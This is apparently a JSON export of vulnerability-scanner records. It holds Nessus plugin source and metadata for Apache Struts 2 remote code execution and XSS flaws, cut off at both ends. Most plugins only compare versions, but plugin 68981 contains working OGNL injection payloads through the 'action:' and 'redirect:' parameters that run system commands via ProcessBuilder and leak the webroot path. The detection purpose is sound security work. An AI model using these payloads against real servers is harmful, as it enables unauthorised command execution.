severity : SECURITY_HOLE,\n generic : TRUE,\n line_limit : 3,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : output\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:39", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. It, therefore, is affected by a remote command execution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.3 RCE (S2-015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_3.NASL", "href": "https://www.tenable.com/plugins/nessus/117389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117389);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2134\", \"CVE-2013-2135\");\n script_bugtraq_id(60345, 60346);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.3 RCE (S2-015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a remote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.3. It, therefore, is affected by a remote command\nexecution vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-015\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.3 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2135\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.2\", \"fixed_version\" : \"2.3.14.3\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:39", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by multiple vulnerabilities including a remote command execution vulnerability and a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117364);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.14.2. It, therefore, is affected by multiple\nvulnerabilities including a remote command execution vulnerability\nand a cross-site scripting (XSS) vulnerability.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2115\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.14.1\", \"fixed_version\" : \"2.3.14.2\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:27:33", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.28. It is, therefore, affected by the following vulnerabilities :\n - A cross-site scripting vulnerability exists due to improper validation of user-supplied input when using a single byte page encoding. A remote attacker can exploit this, via non-spec URL-encoded parameter value including multi-byte characters. (CVE-2016-4003)\n\n - A remote code execution vulnerability exists due to double OGNL evaluation of attribute values assigned to certain tags. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2016-0785)\n\n - A cross-site scripting vulnerability exists due to improper validation of user-supplied input when using the I18NInterceptor. A remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-2162)\n\n - A denial of service vulnerability exists in the Object-Graph Navigation Language (OGNL) component due to a flaw in the implementation of the cache for stored method references. A context-dependent attacker can exploit this to block access to arbitrary websites.\n (CVE-2016-3093)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-24T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.28 Multiple Vulnerabilities (S2-028) (S2-029) (S2-030) (S2-034)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785", "CVE-2016-2162", "CVE-2016-3093", "CVE-2016-4003"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_28_WIN_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/90153", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90153);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-0785\",\n \"CVE-2016-2162\",\n \"CVE-2016-3093\",\n \"CVE-2016-4003\"\n );\n script_bugtraq_id(\n 85066,\n 85070,\n 86311,\n 90961\n );\n\n script_name(english:\"Apache Struts 2.x < 2.3.28 Multiple Vulnerabilities (S2-028) (S2-029) (S2-030) (S2-034)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.3.28. It is, therefore, affected by the following\nvulnerabilities :\n - A cross-site scripting vulnerability exists due to\n improper validation of user-supplied input when using\n a single byte page encoding. A remote attacker can \n exploit this, via non-spec URL-encoded parameter value\n including multi-byte characters. (CVE-2016-4003)\n\n - A remote code execution vulnerability exists due to\n double OGNL evaluation of attribute values assigned to\n certain tags. An unauthenticated, remote attacker can\n exploit this, via a specially crafted request, to\n execute arbitrary code. (CVE-2016-0785)\n\n - A cross-site scripting vulnerability exists due to\n improper validation of user-supplied input when using\n the I18NInterceptor. A remote attacker can exploit this,\n via a specially crafted request, to execute arbitrary\n script code in a user's browser session. (CVE-2016-2162)\n\n - A denial of service vulnerability exists in the\n Object-Graph Navigation Language (OGNL) component due to\n a flaw in the implementation of the cache for stored\n method references. A context-dependent attacker can\n exploit this to block access to arbitrary websites.\n (CVE-2016-3093)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-028.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-029.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-030.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://struts.apache.org/docs/s2-034.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-2328.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.28 or later. Alternatively,\napply the workaround referenced in the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0785\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.3.24.1\", \"fixed_version\" : \"2.3.28\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:41:22", "description": "Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a website) via unspecified vectors. (CVE-2016-3093)", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2016-06-28T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Apache Struts 2 vulnerability (K23432135)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3093"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL23432135.NASL", "href": "https://www.tenable.com/plugins/nessus/91861", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K23432135.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91861);\n script_version(\"2.9\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2016-3093\");\n\n script_name(english:\"F5 Networks BIG-IP : Apache Struts 2 vulnerability (K23432135)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method\nreferences when used with OGNL before 3.0.12, which allows remote\nattackers to cause a denial of service (block access to a website) via\nunspecified vectors. (CVE-2016-3093)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K23432135\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K23432135.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K23432135\";\nvmatrix = make_array();\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0\",\"11.4.0-11.6.1\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running the affected module AM\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-14T14:28:14", "description": "Apache Struts 2.x to 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted 'action:', 'redirect:', or 'redirectAction:' prefix.\n\nThis mechanism was intended to help with attaching navigational information to buttons within forms.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-12T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.15.1 Remote Code Execution (S2-016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2021-09-07T00:00:00", "cpe": ["cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112741", "href": "https://www.tenable.com/plugins/was/112741", "sourceData": "No source data", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:47:09", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression prefixed by the 'action:' parameter, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server. An attacker can exploit the issue by sending a specially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also reportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by an open redirect vulnerability; however, Nessus has not tested for this additional issue.\n\nNote also that this plugin will only report the first vulnerable instance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to 1.3.6 are also affected by this issue as the application utilizes a vulnerable version of Struts 2.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2013-07-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_15_1_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/68981", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68981);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-2251\");\n script_bugtraq_id(61189);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework, which is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression\nprefixed by the 'action:' parameter, a remote, unauthenticated\nattacker can exploit this issue to execute arbitrary commands on the\nremote web server. An attacker can exploit the issue by sending a\nspecially crafted HTTP request to the remote web server.\n\nNote that the 'redirect:' and 'redirectAction' parameters are also\nreportedly affected by the command execution vulnerability.\nAdditionally, this version of Struts 2 is also reportedly affected by\nan open redirect vulnerability; however, Nessus has not tested for\nthis additional issue.\n\nNote also that this plugin will only report the first vulnerable\ninstance of a Struts 2 application.\n\nFinally, note that Apache Archiva versions prior to and equal to\n1.3.6 are also affected by this issue as the application utilizes a\nvulnerable version of Struts 2.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/527977/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-016.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.15.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-2251\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts DefaultActionMapper < 2.3.15.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"?action:%25{(new+java.lang.ProcessBuilder(new\" +\n \"+java.lang.String[]{'\" +cmd+ \"'})).start()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/java\\.lang\\.\" +\n \"(UNIX)?Process(Impl)?@(.+)\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\n# Alternate attack that does not rely on 404 Error Page from Tomcat/JBoss\n# This attack uses the redirect: Parameter\nif (!vuln)\n{\n time = unixtime();\n foreach url (urls)\n {\n vuln_url = url +\"?redirect:${%23req%3d%23context.get('com.opensymphony\" +\n \".xwork2.dispatcher.HttpServletRequest'),%23webroot%3d%23req.get\" +\n \"Session().getServletContext().getRealPath('/'),%23resp%3d%23context.\" +\n \"get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').\" +\n \"getWriter(),%23resp.print('At%20\" +time+ \"%20Nessus%20found%20the\" +\n \"%20path%20is%20'),%23resp.println(%23webroot),%23resp.flush(),\" +\n \"%23resp.close()}\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n exit_on_fail : TRUE\n );\n\n if (\n (res[0] =~ \"200 OK\") &&\n (res[2] =~ '^At '+time+' Nessus found the path is ([a-zA-Z]:\\\\\\\\|/)(.*)')\n )\n {\n vuln = TRUE;\n break;\n }\n if (vuln) break;\n }\n}\n\n# try pingback.\nif(!vuln)\n{\n\n scanner_ip = compat::this_host();\n target_ip = get_host_ip();\n\n ua = get_kb_item(\"global_settings/http_user_agent\");\n if (empty_or_null(ua))\n ua = 'Nessus';\n\n pat = hexstr(rand_str(length:10));\n\n if 